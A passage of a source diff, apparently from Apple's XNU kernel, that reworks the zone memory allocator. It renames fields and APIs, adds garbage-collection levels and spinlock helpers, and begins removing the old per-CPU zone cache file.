+               kmem_free(kernel_map, (vm_address_t)allocs_pcpu, PAGE_SIZE);
+
                zdestroy(test_zone);
+               zdestroy(test_pcpu_zone);
        } else {
                printf("run_zone_test: skipping sequester test (not enabled)\n");
        }
@@ -6463,7 +8929,7 @@ run_zone_test(void)
 void
 zone_gc_replenish_test(void)
 {
-       zone_gc(FALSE);
+       zone_gc(ZONE_GC_DRAIN);
 }
 
 
@@ -6478,8 +8944,7 @@ zone_alloc_replenish_test(void)
         */
        zone_index_foreach(i) {
                z = &zone_array[i];
-               if (z->prio_refill_count &&
-                   zone_elem_size(z) >= sizeof(struct data)) {
+               if (z->z_replenishes && zone_elem_size(z) >= sizeof(struct data)) {
                        z = &zone_array[i];
                        break;
                }
index 541de3bdd3ebb75d493a4f8b6e4c17ff3a11a50c..0a6d7fb56744560d14112663601af19e38970d16 100644 (file)
@@ -425,6 +425,15 @@ extern void    *zalloc_permanent(
 #define zalloc_permanent_type(type_t) \
        ((type_t *)zalloc_permanent(sizeof(type_t), ZALIGN(type_t)))
 
+/*!
+ * @function zalloc_first_proc_made()
+ *
+ * @abstract
+ * Declare that the "early" allocation phase is done.
+ */
+extern void
+zalloc_first_proc_made(void);
+
 #pragma mark XNU only: per-cpu allocations
 
 /*!
@@ -692,6 +701,7 @@ __enum_decl(zone_reserved_id_t, zone_id_t, {
        ZONE_ID_PROC,
        ZONE_ID_VM_MAP_COPY,
        ZONE_ID_PMAP,
+       ZONE_ID_VM_MAP,
 
        ZONE_ID__FIRST_DYNAMIC,
 });
@@ -727,6 +737,7 @@ const char     *zone_heap_name(
  * @param zone          the specified zone
  * @returns             the zone (sub)map this zone allocates from.
  */
+__pure2
 extern vm_map_t zone_submap(
        zone_t                  zone);
 
@@ -813,6 +824,8 @@ extern zone_t   zone_create_ext(
  * - isn't sensitive to @c zone_t::elem_size being compromised,
  * - is slightly faster as it saves one load and a multiplication.
  *
+ * @warning: zones using foreign memory can't use this interface.
+ *
  * @param zone_id       the zone ID the address needs to belong to.
  * @param elem_size     the size of elements for this zone.
  * @param addr          the element address to check.
@@ -822,30 +835,47 @@ extern void     zone_id_require(
        vm_size_t               elem_size,
        void                   *addr);
 
+/*!
+ * @function zone_id_require_allow_foreign
+ *
+ * @abstract
+ * Requires for a given pointer to belong to the specified zone, by ID and size.
+ *
+ * @discussion
+ * This is a version of @c zone_id_require() that works with zones allowing
+ * foreign memory.
+ */
+extern void     zone_id_require_allow_foreign(
+       zone_id_t               zone_id,
+       vm_size_t               elem_size,
+       void                   *addr);
+
 /*
  * Zone submap indices
  *
- * Z_SUBMAP_IDX_VA_RESTRICTED_MAP (LP64)
+ * Z_SUBMAP_IDX_VA_RESTRICTED (LP64)
  * used to restrict VM allocations lower in the kernel VA space,
  * for pointer packing
  *
- * Z_SUBMAP_IDX_GENERAL_MAP
+ * Z_SUBMAP_IDX_VA_RESERVE (ILP32)
+ * used to keep a reserve of VA space for the urgent allocations
+ * backing allocations of crucial VM types (fictious pages, holes, ...)
+ *
+ * Z_SUBMAP_IDX_GENERAL
  * used for unrestricted allocations
  *
- * Z_SUBMAP_IDX_BAG_OF_BYTES_MAP
+ * Z_SUBMAP_IDX_BAG_OF_BYTES
  * used to sequester bags of bytes from all other allocations and allow VA reuse
  * within the map
  */
-#if !defined(__LP64__)
-#define Z_SUBMAP_IDX_GENERAL_MAP        0
-#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP   1
-#define Z_SUBMAP_IDX_COUNT              2
+#if defined(__LP64__)
+#define Z_SUBMAP_IDX_VA_RESTRICTED  0
 #else
-#define Z_SUBMAP_IDX_VA_RESTRICTED_MAP  0
-#define Z_SUBMAP_IDX_GENERAL_MAP        1
-#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP   2
-#define Z_SUBMAP_IDX_COUNT              3
+#define Z_SUBMAP_IDX_VA_RESERVE     0
 #endif
+#define Z_SUBMAP_IDX_GENERAL        1
+#define Z_SUBMAP_IDX_BAG_OF_BYTES   2
+#define Z_SUBMAP_IDX_COUNT          3
 
 /* Change zone sub-map, to be called from the zone_create_ext() setup hook */
 extern void     zone_set_submap_idx(
@@ -855,23 +885,30 @@ extern void     zone_set_submap_idx(
 /* Make zone as non expandable, to be called from the zone_create_ext() setup hook */
 extern void     zone_set_noexpand(
        zone_t          zone,
-       vm_size_t       maxsize);
+       vm_size_t       max_elements);
 
 /* Make zone exhaustible, to be called from the zone_create_ext() setup hook */
 extern void     zone_set_exhaustible(
        zone_t          zone,
-       vm_size_t       maxsize);
+       vm_size_t       max_elements);
 
-/* Initially fill zone with specified number of elements */
-extern int      zfill(
-       zone_t          zone,
-       int             nelem);
-
-/* Fill zone with memory */
-extern void     zcram(
+/*!
+ * @function zone_fill_initially
+ *
+ * @brief
+ * Initially fill a non collectable zone to have the specified amount of
+ * elements.
+ *
+ * @discussion
+ * This function must be called on a non collectable permanent zone before it
+ * has been used yet.
+ *
+ * @param zone          The zone to fill.
+ * @param nelems        The number of elements to be able to hold.
+ */
+extern void     zone_fill_initially(
        zone_t          zone,
-       vm_offset_t     newmem,
-       vm_size_t       size);
+       vm_size_t       nelems);
 
 #pragma mark XNU only: misc & implementation details
 
@@ -940,6 +977,26 @@ extern void zone_view_startup_init(
 #define __zpcpu_cast(ptr, e)    ((typeof(ptr))(e))
 #define __zpcpu_next(ptr)       __zpcpu_cast(ptr, __zpcpu_addr(ptr) + PAGE_SIZE)
 
+/**
+ * @macro __zpcpu_mangle_for_boot()
+ *
+ * @discussion
+ * Per-cpu variables allocated in zones (as opposed to percpu globals) that need
+ * to function early during boot (before @c STARTUP_SUB_ZALLOC) might use static
+ * storage marked @c __startup_data and replace it with the proper allocation
+ * at the end of the @c STARTUP_SUB_ZALLOC phase (@c STARTUP_RANK_LAST).
+ *
+ * However, some devices boot from a cpu where @c cpu_number() != 0. This macro
+ * provides the proper mangling of the storage into a "fake" percpu pointer so
+ * that accesses through @c zpercpu_get() functions properly.
+ *
+ * This is invalid to use after the @c STARTUP_SUB_ZALLOC phase has completed.
+ */
+#define __zpcpu_mangle_for_boot(ptr)  ({ \
+       assert(startup_phase < STARTUP_SUB_ZALLOC); \
+       __zpcpu_cast(ptr, __zpcpu_mangle(__zpcpu_addr(ptr) - ptoa(cpu_number()))); \
+})
+
 extern unsigned zpercpu_count(void) __pure2;
 
 
index 9fff604294ac05f5bfff961ab69dc6efa9aba8bd..366ce538e1aed38534e541787765be7f12f2d1c1 100644 (file)
 #include <kern/locks.h>
 #include <kern/btlog.h>
 #include <kern/simple_lock.h>
-#include <kern/zcache_internal.h>
 
 #include <os/atomic_private.h>
+#include <sys/queue.h>
 
 #if KASAN
-#include <sys/queue.h>
 #include <san/kasan.h>
-/*
- * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan.
- * Otherwise they are double-duty with what kasan already does.
- */
-#define ZALLOC_ENABLE_POISONING 0
-#else /* !KASAN */
-#define ZALLOC_ENABLE_POISONING 1
+#include <kern/spl.h>
 #endif /* !KASAN */
 
-#if DEBUG || DEVELOPMENT
-#define ZALLOC_DETAILED_STATS  1
-#else
-#define ZALLOC_DETAILED_STATS  0
-#endif
-
 /*!
  * @file <kern/zalloc_internal.h>
  *
@@ -140,11 +127,12 @@ typedef struct zone_packed_virtual_address {
 struct zone_stats {
        uint64_t            zs_mem_allocated;
        uint64_t            zs_mem_freed;
-#if ZALLOC_DETAILED_STATS
-       uint64_t            zs_mem_wasted;
-#endif /* ZALLOC_DETAILED_STATS */
+       uint32_t            zs_poison_seqno; /* counter for poisoning every N frees */
+       uint32_t            zs_alloc_rr;     /* allocation rr bias */
 };
 
+STAILQ_HEAD(zone_depot, zone_magazine);
+
 struct zone {
        /*
         * Readonly / rarely written fields
@@ -160,52 +148,47 @@ struct zone {
        zone_stats_t        z_stats;
        const char         *z_name;
        struct zone_view   *z_views;
-#ifdef CONFIG_ZCACHE
-       struct zone_cache   zcache;
-#endif  /* CONFIG_ZCACHE */
 
-       uint16_t            alloc_pages;    /* size used for more memory in pages */
-       uint16_t            z_elem_size;    /* size of an element */
-       uint16_t            pcpu_elem_size;
-       uint16_t            prio_refill_count; /* if !=0 , refill to this count */
-       uint32_t            page_count_max; /* how large can this zone grow */
+       struct thread      *z_expander;
+       struct zone_cache  *__zpercpu z_pcpu_cache;
 
-       uint32_t            page_count_hwm; /* page_count high watermark */
-       uint32_t            page_count;     /* number of pages used by this zone */
-       uint32_t            countavail;     /* Number of elements available */
+       uint16_t            z_chunk_pages;  /* size used for more memory in pages  */
+       uint16_t            z_chunk_elems;  /* count of allocations per chunk */
+       uint16_t            z_elems_rsv;    /* maintain a free reserve of elements */
+       uint16_t            z_elem_size;    /* size of an element                  */
 
        uint64_t
        /*
         * Lifecycle state (Mutable after creation)
         */
-           destroyed          :1,  /* zone is (being) destroyed */
-           expanding_no_vm_priv:1, /* zone expanding via a non-vm_privileged thread */
-           expanding_vm_priv  :1,  /* zone expanding via a vm_privileged thread */
-           async_pending      :1,  /* asynchronous allocation pending? */
-           waiting            :1,  /* is thread waiting for expansion? */
-           zone_replenishing  :1,
+           z_destroyed        :1,  /* zone is (being) destroyed */
+           z_async_refilling  :1,  /* asynchronous allocation pending? */
+           z_replenish_wait   :1,  /* someone is waiting on the replenish thread */
+           z_expanding_wait   :1,  /* is thread waiting for expansion? */
+           z_expander_vm_priv :1,  /* a vm privileged thread is expanding */
 
        /*
         * Security sensitive configuration bits
         */
-           allows_foreign     :1,  /* allow non-zalloc space  */
-           destructible       :1,  /* zone can be zdestroy()ed  */
+           z_allows_foreign   :1,  /* allow non-zalloc space  */
+           z_destructible     :1,  /* zone can be zdestroy()ed  */
            kalloc_heap        :2,  /* zone_kheap_id_t when part of a kalloc heap */
-           noencrypt          :1,  /* do not encrypt pages when hibernating */
-           submap_idx         :2,  /* a Z_SUBMAP_IDX_* value */
-           va_sequester       :1,  /* page sequester: no VA reuse with other zones */
-           zfree_clear_mem    :1,  /* clear memory of elements on free and assert on alloc */
+           z_noencrypt        :1,  /* do not encrypt pages when hibernating */
+           z_submap_idx       :2,  /* a Z_SUBMAP_IDX_* value */
+           z_va_sequester     :1,  /* page sequester: no VA reuse with other zones */
+           z_free_zeroes      :1,  /* clear memory of elements on free and assert on alloc */
 
        /*
         * Behavior configuration bits
         */
+           z_percpu           :1,  /* the zone is percpu */
+           z_permanent        :1,  /* the zone allocations are permanent */
+           z_replenishes      :1,  /* uses the async replenish mechanism for VM */
+           z_nocaching        :1,  /* disallow zone caching for this zone */
            collectable        :1,  /* garbage collect empty pages */
-           cpu_cache_enabled  :1,
-           permanent          :1,  /* the zone allocations are permanent */
            exhaustible        :1,  /* merely return if empty? */
            expandable         :1,  /* expand zone (with message)? */
            no_callout         :1,
-           percpu             :1,  /* the zone is percpu */
 
            _reserved          :26,
 
@@ -227,7 +210,20 @@ struct zone {
         * often mutated fields
         */
 
-       decl_simple_lock_data(, lock);
+       lck_spin_t          z_lock;
+       struct zone_depot   z_recirc;
+
+       /*
+        * Page accounting (wired / VA)
+        *
+        * Those numbers are unscaled for z_percpu zones
+        * (zone_scale_for_percpu() needs to be used to find the true value).
+        */
+       uint32_t            z_wired_max;    /* how large can this zone grow        */
+       uint32_t            z_wired_hwm;    /* z_wired_cur high watermark          */
+       uint32_t            z_wired_cur;    /* number of pages used by this zone   */
+       uint32_t            z_wired_empty;  /* pages collectable by GC             */
+       uint32_t            z_va_cur;       /* amount of VA used by this zone      */
 
        /*
         * list of metadata structs, which maintain per-page free element lists
@@ -235,17 +231,48 @@ struct zone {
         * Note: Due to the index packing in page metadata,
         *       these pointers can't be at the beginning of the zone struct.
         */
-       zone_pva_t          pages_any_free_foreign;     /* foreign pages crammed into zone */
-       zone_pva_t          pages_all_used_foreign;
-       zone_pva_t          pages_all_free;
-       zone_pva_t          pages_intermediate;
-       zone_pva_t          pages_all_used;
-       zone_pva_t          pages_sequester;            /* sequestered pages - allocated VA with no populated pages */
-
-       uint32_t            zp_count;                   /* counter for poisoning every N frees */
-       uint32_t            countfree;                  /* Number of free elements */
-       uint32_t            allfree_page_count;         /* Number of pages collectable by GC */
-       uint32_t            sequester_page_count;
+       zone_pva_t          z_pageq_empty;  /* populated, completely empty pages   */
+       zone_pva_t          z_pageq_partial;/* populated, partially filled pages   */
+       zone_pva_t          z_pageq_full;   /* populated, completely full pages    */
+       zone_pva_t          z_pageq_va;     /* non-populated VA pages              */
+
+       /*
+        * Zone statistics
+        *
+        * z_contention_wma:
+        *   weighted moving average of the number of contentions per second,
+        *   in Z_CONTENTION_WMA_UNIT units (fixed point decimal).
+        *
+        * z_contention_cur:
+        *   count of recorded contentions that will be fused in z_contention_wma
+        *   at the next period.
+        *
+        * z_recirc_cur:
+        *   number of magazines in the recirculation depot.
+        *
+        * z_elems_free:
+        *   number of free elements in the zone.
+        *
+        * z_elems_{min,max}:
+        *   tracks the low/high watermark of z_elems_free for the current
+        *   weighted moving average period.
+        *
+        * z_elems_free_wss:
+        *   weighted moving average of the (z_elems_free_max - z_elems_free_min)
+        *   amplited which is used by the GC for trim operations.
+        *
+        * z_elems_avail:
+        *   number of elements in the zone (at all).
+        */
+#define Z_CONTENTION_WMA_UNIT (1u << 8)
+       uint32_t            z_contention_wma;
+       uint32_t            z_contention_cur;
+       uint32_t            z_recirc_cur;
+       uint32_t            z_elems_free_max;
+       uint32_t            z_elems_free_wss;
+       uint32_t            z_elems_free_min;
+       uint32_t            z_elems_free;   /* Number of free elements             */
+       uint32_t            z_elems_avail;  /* Number of elements available        */
 
 #if CONFIG_ZLEAKS
        uint32_t            zleak_capture;  /* per-zone counter for capturing every N allocations */
@@ -254,7 +281,8 @@ struct zone {
        gzalloc_data_t      gz;
 #endif
 #if KASAN_ZALLOC
-       vm_size_t           kasan_redzone;
+       uint32_t            z_kasan_redzone;
+       spl_t               z_kasan_spl;
 #endif
 #if DEBUG || DEVELOPMENT || CONFIG_ZLEAKS
        /* zone logging structure to hold stacks and element references to those stacks. */
@@ -300,16 +328,33 @@ struct kheap_zones {
 };
 
 extern zone_security_options_t zsecurity_options;
-extern uint32_t _Atomic        num_zones;
+extern zone_id_t _Atomic       num_zones;
 extern uint32_t                zone_view_count;
 extern struct zone             zone_array[];
-extern lck_grp_t               zone_locks_grp;
 extern const char * const      kalloc_heap_names[KHEAP_ID_COUNT];
+extern bool                    panic_include_zprint;
+#if CONFIG_ZLEAKS
+extern bool                    panic_include_ztrace;
+extern struct ztrace          *top_ztrace;
+#endif
+extern mach_memory_info_t     *panic_kext_memory_info;
+extern vm_size_t               panic_kext_memory_size;
+extern unsigned int            zone_map_jetsam_limit;
 
 #define zone_index_foreach(i) \
-       for (uint32_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \
+       for (zone_id_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \
            i < num_zones_##i; i++)
 
+#define zone_foreach(z) \
+       for (zone_t z = &zone_array[1], \
+           last_zone_##z = &zone_array[os_atomic_load(&num_zones, acquire)]; \
+           z < last_zone_##z; z++)
+
+struct zone_map_range {
+       vm_offset_t min_address;
+       vm_offset_t max_address;
+} __attribute__((aligned(2 * sizeof(vm_offset_t))));
+
 __pure2
 static inline vm_offset_t
 zone_elem_size(zone_t zone)
@@ -320,7 +365,16 @@ zone_elem_size(zone_t zone)
 static inline uint32_t
 zone_count_allocated(zone_t zone)
 {
-       return zone->countavail - zone->countfree;
+       return zone->z_elems_avail - zone->z_elems_free;
+}
+
+static inline vm_size_t
+zone_scale_for_percpu(zone_t zone, vm_size_t size)
+{
+       if (zone->z_percpu) {
+               size *= zpercpu_count();
+       }
+       return size;
 }
 
 static inline vm_size_t
@@ -330,26 +384,29 @@ zone_size_wired(zone_t zone)
         * this either require the zone lock,
         * or to be used for statistics purposes only.
         */
-       return ptoa(os_atomic_load(&zone->page_count, relaxed));
+       vm_size_t size = ptoa(os_atomic_load(&zone->z_wired_cur, relaxed));
+       return zone_scale_for_percpu(zone, size);
 }
 
 static inline vm_size_t
 zone_size_free(zone_t zone)
 {
-       return (vm_size_t)zone->pcpu_elem_size * zone->countfree;
+       return zone_scale_for_percpu(zone,
+                  (vm_size_t)zone->z_elem_size * zone->z_elems_free);
 }
 
 static inline vm_size_t
 zone_size_allocated(zone_t zone)
 {
-       return (vm_size_t)zone->pcpu_elem_size * zone_count_allocated(zone);
+       return zone_scale_for_percpu(zone,
+                  (vm_size_t)zone->z_elem_size * zone_count_allocated(zone));
 }
 
 static inline vm_size_t
 zone_size_wasted(zone_t zone)
 {
-       return zone_size_wired(zone) -
-              (vm_size_t)zone->pcpu_elem_size * zone->countavail;
+       return zone_size_wired(zone) - zone_scale_for_percpu(zone,
+                  (vm_size_t)zone->z_elem_size * zone->z_elems_avail);
 }
 
 /*
@@ -359,15 +416,61 @@ zone_size_wasted(zone_t zone)
  */
 extern uint64_t get_zones_collectable_bytes(void);
 
-/*
- * zone_gc also checks if the zone maps are getting close to full and triggers
- * jetsams if needed, provided consider_jetsams is set to TRUE.
+/*!
+ * @enum zone_gc_level_t
+ *
+ * @const ZONE_GC_TRIM
+ * Request a trimming GC: it will trim allocations in excess
+ * of the working set size estimate only.
+ *
+ * @const ZONE_GC_DRAIN
+ * Request a draining GC: this is an aggressive mode that will
+ * cause all caches to be drained and all free pages returned to the system.
+ *
+ * @const ZONE_GC_JETSAM
+ * Request to consider a jetsam, and then fallback to @c ZONE_GC_TRIM or
+ * @c ZONE_GC_DRAIN depending on the state of the zone map.
+ * To avoid deadlocks, only @c vm_pageout_garbage_collect() should ever
+ * request a @c ZONE_GC_JETSAM level.
+ */
+__enum_closed_decl(zone_gc_level_t, uint32_t, {
+       ZONE_GC_TRIM,
+       ZONE_GC_DRAIN,
+       ZONE_GC_JETSAM,
+});
+
+/*!
+ * @function zone_gc
+ *
+ * @brief
+ * Reduces memory used by zones by trimming caches and freelists.
  *
- * To avoid deadlocks, we only pass a value of TRUE from within the
- * vm_pageout_garbage_collect thread.
+ * @discussion
+ * @c zone_gc() is called:
+ * - by the pageout daemon when the system needs more free pages.
+ * - by the VM when contiguous page allocation requests get stuck
+ *   (see vm_page_find_contiguous()).
+ *
+ * @param level         The zone GC level requested.
+ */
+extern void     zone_gc(zone_gc_level_t level);
+
+extern void     zone_gc_trim(void);
+extern void     zone_gc_drain(void);
+
+#define ZONE_WSS_UPDATE_PERIOD  10
+/*!
+ * @function compute_zone_working_set_size
+ *
+ * @brief
+ * Recomputes the working set size for every zone
+ *
+ * @discussion
+ * This runs about every @c ZONE_WSS_UPDATE_PERIOD seconds (10),
+ * computing an exponential moving average with a weight of 75%,
+ * so that the history of the last minute is the dominating factor.
  */
-extern void     zone_gc(boolean_t consider_jetsams);
-extern void     consider_zone_gc(boolean_t consider_jetsams);
+extern void     compute_zone_working_set_size(void *);
 
 /* Debug logging for zone-map-exhaustion jetsams. */
 extern void     get_zone_map_size(uint64_t *current_size, uint64_t *capacity);
@@ -376,17 +479,25 @@ extern void     get_largest_zone_info(char *zone_name, size_t zone_name_len, uin
 /* Bootstrap zone module (create zone zone) */
 extern void     zone_bootstrap(void);
 
-/*
+/*!
+ * @function zone_foreign_mem_init
+ *
+ * @brief
  * Steal memory from pmap (prior to initialization of zalloc)
  * for the special vm zones that allow foreign memory and store
- * the range so as to facilitate range checking in zfree/zcram.
+ * the range so as to facilitate range checking in zfree.
  */
 __startup_func
-extern vm_offset_t zone_foreign_mem_init(vm_size_t size);
+extern vm_offset_t zone_foreign_mem_init(
+       vm_size_t       size);
 
-/*
- * Returns size (greater than min_pages) that is a multiple
- * of the allocation granule for the zone.
+/*!
+ * @function zone_get_foreign_alloc_size
+ *
+ * @brief
+ * Compute the correct size (greater than @c ptoa(min_pages)) that is a multiple
+ * of the allocation granule for the zone with the given creation flags and
+ * element size.
  */
 __startup_func
 extern vm_size_t zone_get_foreign_alloc_size(
@@ -395,6 +506,22 @@ extern vm_size_t zone_get_foreign_alloc_size(
        zone_create_flags_t  flags,
        uint16_t             min_pages);
 
+/*!
+ * @function zone_cram_foreign
+ *
+ * @brief
+ * Cram memory allocated with @c zone_foreign_mem_init() into a zone.
+ *
+ * @param zone          The zone to cram memory into.
+ * @param newmem        The base address for the memory to cram.
+ * @param size          The size of the memory to cram into the zone.
+ */
+__startup_func
+extern void     zone_cram_foreign(
+       zone_t          zone,
+       vm_offset_t     newmem,
+       vm_size_t       size);
+
 extern bool     zone_maps_owned(
        vm_address_t    addr,
        vm_size_t       size);
@@ -404,8 +531,8 @@ extern void     zone_map_sizes(
        vm_map_size_t  *pfree,
        vm_map_size_t  *plargest_free);
 
-extern boolean_t
-is_zone_map_nearing_exhaustion(void);
+extern bool
+zone_map_nearing_exhaustion(void);
 
 #if defined(__LP64__)
 #define ZONE_POISON       0xdeadbeefdeadbeef
@@ -413,12 +540,6 @@ is_zone_map_nearing_exhaustion(void);
 #define ZONE_POISON       0xdeadbeef
 #endif
 
-/*
- * Used by zalloc_direct_locked() and zcache to mark elements that have been
- * cleared or poisoned and need to be checked.
- */
-#define ZALLOC_ELEMENT_NEEDS_VALIDATION ((vm_offset_t)1)
-
 static inline vm_tag_t
 zalloc_flags_get_tag(zalloc_flags_t flags)
 {
@@ -428,54 +549,23 @@ zalloc_flags_get_tag(zalloc_flags_t flags)
 extern void    *zalloc_ext(
        zone_t          zone,
        zone_stats_t    zstats,
-       zalloc_flags_t  flags,
-       vm_size_t       wasted);
+       zalloc_flags_t  flags);
 
 extern void     zfree_ext(
        zone_t          zone,
        zone_stats_t    zstats,
        void           *addr);
 
-/* free an element with no regard for gzalloc, zleaks, or kasan*/
-extern void     zfree_direct_locked(
-       zone_t          zone,
-       vm_offset_t     elem,
-       bool            poison);
-
-/*
- * attempts to allocate an element with no regard for gzalloc, zleaks, or kasan
- * returns an address possibly tagged with ZALLOC_ELEMENT_NEEDS_VALIDATION.
+/*!
+ * @function zone_replenish_configure
+ *
+ * @brief
+ * Used by zones backing the VM to maintain a reserve of free elements.
+ *
+ * @discussion
+ * This function should not be used by anyone else than the VM.
  */
-extern vm_offset_t zalloc_direct_locked(
-       zone_t          zone,
-       zalloc_flags_t  flags,
-       vm_size_t       waste);
-
-extern uint32_t zone_poison_count_init(
-       zone_t          zone);
-
-extern bool     zfree_clear_or_poison(
-       zone_t          zone,
-       uint32_t       *zp_count,
-       vm_address_t    addr);
-
-extern void     zone_clear_freelist_pointers(
-       zone_t          zone,
-       vm_offset_t     addr);
-
-#if ZALLOC_ENABLE_POISONING
-extern void     zalloc_validate_element(
-       zone_t          zone,
-       vm_offset_t     addr,
-       vm_size_t       size,
-       bool            validate);
-#endif
-
-extern void     zone_allocated_element_validate(
-       zone_t          zone,
-       vm_offset_t     addr);
-
-extern void     zone_prio_refill_configure(
+extern void     zone_replenish_configure(
        zone_t          zone);
 
 extern vm_size_t zone_element_size(
@@ -526,8 +616,35 @@ extern uint32_t zone_index_from_tag_index(
 
 #endif /* VM_MAX_TAG_ZONES */
 
-#define lock_zone(zone)   simple_lock(&(zone)->lock, &zone_locks_grp)
-#define unlock_zone(zone) simple_unlock(&(zone)->lock)
+static inline void
+zone_lock(zone_t zone)
+{
+#if KASAN_ZALLOC
+       spl_t s = 0;
+       if (zone->kasan_fakestacks) {
+               s = splsched();
+       }
+#endif /* KASAN_ZALLOC */
+       lck_spin_lock(&zone->z_lock);
+#if KASAN_ZALLOC
+       zone->z_kasan_spl = s;
+#endif /* KASAN_ZALLOC */
+}
+
+static inline void
+zone_unlock(zone_t zone)
+{
+#if KASAN_ZALLOC
+       spl_t s = zone->z_kasan_spl;
+       zone->z_kasan_spl = 0;
+#endif /* KASAN_ZALLOC */
+       lck_spin_unlock(&zone->z_lock);
+#if KASAN_ZALLOC
+       if (zone->kasan_fakestacks) {
+               splx(s);
+       }
+#endif /* KASAN_ZALLOC */
+}
 
 #if CONFIG_GZALLOC
 void gzalloc_init(vm_size_t);
diff --git a/osfmk/kern/zcache.c b/osfmk/kern/zcache.c
deleted file mode 100644 (file)
index f088999..0000000
+++ /dev/null
@@ -1,698 +0,0 @@
-/*
- * Copyright (c) 2017-2020 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-
-#include <kern/assert.h>
-#include <kern/cpu_data.h>
-#include <mach/mach_host.h>
-#include <vm/vm_kern.h>
-#include <kern/startup.h>
-#include <kern/zalloc_internal.h>
-
-/* Size of array in magazine determined by boot-arg or default */
-TUNABLE(uint16_t, magazine_element_count, "zcc_magazine_element_count", 8);
-
-/* Size of depot lists determined by boot-arg or default */
-TUNABLE(uint16_t, depot_element_count, "zcc_depot_element_count", 8);
-
-SECURITY_READ_ONLY_LATE(zone_t)    magazine_zone;       /* zone to allocate zcc_magazine structs from */
-SECURITY_READ_ONLY_LATE(uintptr_t) zcache_canary;       /* Canary used for the caching layer to prevent UaF attacks */
-
-/*
- *     The zcc_magazine is used as a stack to store cached zone elements. These
- *     sets of elements can be moved around to perform bulk operations.
- */
-struct zcc_magazine {
-       uint32_t zcc_magazine_index;            /* Used as a stack pointer to acess elements in the array */
-       uint32_t zcc_magazine_capacity;         /* Number of pointers able to be stored in the zcc_elements array */
-       vm_offset_t zcc_elements[0];            /* Array of pointers to objects */
-};
-
-
-/*
- * Each CPU will use one of these to store its elements
- */
-struct zcc_per_cpu_cache {
-       /* Magazine from which we will always try to allocate from and free to first */
-       struct zcc_magazine *current;
-       /* Dedicated magazine for a quick reload and to prevent thrashing wen we swap with the depot */
-       struct zcc_magazine *previous;
-       /* Zcache poisoning count */
-       uint32_t zp_count;
-#if ZALLOC_DETAILED_STATS
-       uint64_t zcc_allocs;
-       uint64_t zcc_frees;
-#endif /* ZALLOC_DETAILED_STATS */
-};
-
-
-/*     This is the basic struct to take care of cahing and is included within
- *      the zone.
- */
-struct zcc_depot {
-       /* marks the point in the array where empty magazines begin */
-       int zcc_depot_index;
-
-#if ZALLOC_DETAILED_STATS
-       uint64_t zcc_swap;
-       uint64_t zcc_fill;
-       uint64_t zcc_drain;
-       uint64_t zcc_fail;
-       uint64_t zcc_gc;
-#endif /* ZALLOC_DETAILED_STATS */
-
-       /* Stores full and empty magazines in the depot layer */
-       struct zcc_magazine *zcc_depot_list[0];
-};
-
-static bool zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag);
-static void zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag);
-static bool zcache_mag_has_space(struct zcc_magazine *mag);
-static bool zcache_mag_has_elements(struct zcc_magazine *mag);
-static void zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b);
-static void zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache);
-static void zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache);
-static void zcache_canary_add(zone_t zone, vm_offset_t addr);
-#if ZALLOC_ENABLE_POISONING
-static void zcache_validate_element(zone_t zone, vm_offset_t *addr, bool poison);
-static void zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup);
-#endif
-
-/*
- * zcache_ready
- *
- * Returns whether or not the zone caches are ready to use
- *
- */
-static bool
-zcache_ready(void)
-{
-       return magazine_zone != NULL;
-}
-
-/*
- * zcache_bootstrap
- *
- * Initializes zone to allocate magazines from and sets
- * magazine_element_count and depot_element_count from
- * boot-args or default values
- *
- */
-__startup_func
-static void
-zcache_bootstrap(void)
-{
-       int magazine_size = sizeof(struct zcc_magazine) + magazine_element_count * sizeof(void *);
-       zone_t magzone;
-
-       /* Generate the canary value for zone caches */
-       zcache_canary = (uintptr_t) early_random();
-
-       magzone = zone_create("zcc_magazine_zone", magazine_size,
-           ZC_NOCACHING | ZC_ZFREE_CLEARMEM);
-
-       /*
-        * This causes zcache_ready() to return true.
-        */
-       os_atomic_store(&magazine_zone, magzone, compiler_acq_rel);
-
-       /*
-        * Now that we are initialized, we can enable zone caching for zones that
-        * were made before zcache_bootstrap() was called.
-        *
-        * The system is still single threaded so we don't need to take the lock.
-        */
-       zone_index_foreach(i) {
-               if (zone_array[i].cpu_cache_enabled) {
-                       zcache_init(&zone_array[i]);
-               }
-       }
-}
-STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zcache_bootstrap);
-
-static struct zcc_magazine *
-zcache_mag_alloc(void)
-{
-       struct zcc_magazine *mag = zalloc_flags(magazine_zone, Z_WAITOK);
-       mag->zcc_magazine_capacity = magazine_element_count;
-       return mag;
-}
-
-
-/*
- * zcache_init
- *
- * Initializes all parts of the per-cpu caches for a given zone
- *
- * Parameters:
- * zone    pointer to zone on which to iniitalize caching
- *
- */
-void
-zcache_init(zone_t zone)
-{
